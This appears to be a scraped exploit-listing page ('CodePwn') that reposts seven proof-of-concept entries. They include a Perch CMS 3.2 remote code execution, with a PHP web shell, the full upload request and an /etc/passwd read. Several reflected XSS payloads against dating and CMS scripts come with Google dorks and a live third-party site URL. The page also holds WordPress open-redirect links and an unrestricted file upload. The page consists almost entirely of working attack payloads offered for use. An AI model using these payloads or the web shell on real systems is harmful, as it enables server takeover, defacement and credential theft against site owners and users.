Latest exploits :: CodePwn

<pre><code>Exploit Title: Perch v3.2 - Remote Code Execution (RCE) Application: Perch Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://grabaperch.com/ Software Link: https://grabaperch.com/download Date of found: 21.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/) 3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/) 4. upload poc.phar file poc.phar file contents : <?php $a=$_GET['code']; echo system($a);?> 5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd poc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1 Host: localhost Content-Length: 1071 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9 Connection: close ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceTitle" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image"; filename="poc.phar" Content-Type: application/octet-stream <?php $a=$_GET['code']; echo system($a);?> ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_field" 1 ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="image_assetID" ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="resourceBucket" admin ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="tags" test ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="btnsubmit" Submit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="formaction" edit ------WebKitFormBoundaryYGoerZn09hHSjd4Z Content-Disposition: form-data; name="token" 5494af3e8dbe5ac399ca7f12219cfe82 ------WebKitFormBoundaryYGoerZn09hHSjd4Z-- </code></pre>

<pre><code># Exploit Title: mooDating 1.2 - Reflected XSS # Exploit Author: CraCkEr aka (skalvin) # Date: 22/07/2023 # Vendor: mooSocial # Vendor Homepage: https://moodatingscript.com/ # Software Link: https://demo.moodatingscript.com/home # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-3849 - CVE-2023-3848 - CVE-2023-3847 - CVE-2023-3846 CVE-2023-3843 - CVE-2023-3845 - CVE-2023-3844 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /matchmakings/question URL parameter is vulnerable to RXSS https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number= https://website/matchmakings/question[XSS]?number= Path: /friends URL parameter is vulnerable to RXSS https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model https://website/friends[XSS]/ajax_invite?mode=model Path: /friends/ajax_invite URL parameter is vulnerable to RXSS https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model https://website/friends/ajax_invite[XSS]?mode=model Path: /pages URL parameter is vulnerable to RXSS https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l Path: /users URL parameter is vulnerable to RXSS https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity https://website/user[XSS]/view/108?tab=activity Path: /users/view URL parameter is vulnerable to RXSS https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity https://website/users/view[XSS]/108?tab=activity Path: /find-a-match URL parameter is vulnerable to RXSS https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0 https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0 [XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6 [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : CMSctweb creative v 1.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | | # Vendor : http://www.contedia.com/ | | # Dork : "ct web design by brown bear creative" inurl:.php?id= | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /department.php?id=39'<script>alert(/indoushka/);</script> [+] http://www.canterburyct.org/department.php?id=39%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : CMS Ultimate Solutions DreamSus v1.4 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://dreamsus.com | | # Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum'"()%26%25<acx><marquee>Hacked by indoushka</marquee>&tpages=4 [+] http://127.0.0.1/spcollegejejurieduin/gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&tpages=4 Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress Page Builder KingComposer 2.9.6 Open Redirect Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://kingcomposer.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/ [+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/ Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : WordPress Image Optimization 3.8.2 Open Redirect Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://wordpress.org/plugins/optimole-wp/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg [+] https://mlsxkssu4flj.i.optimolecom/nyJIGCw._y-W~3254a/w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : CMS Ultimate Solutions DreamSus v1.4 unrestricted file upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://dreamsus.com | | # Dork : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] http://127.0.0.1/spcollegejejurieduin/add_testimonial.php <==== Fill in the blanks and choose your malicious file and upload [+] http://127.0.0.1/spcollegejejurieduin/uploads/testimonial/Ev!l.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>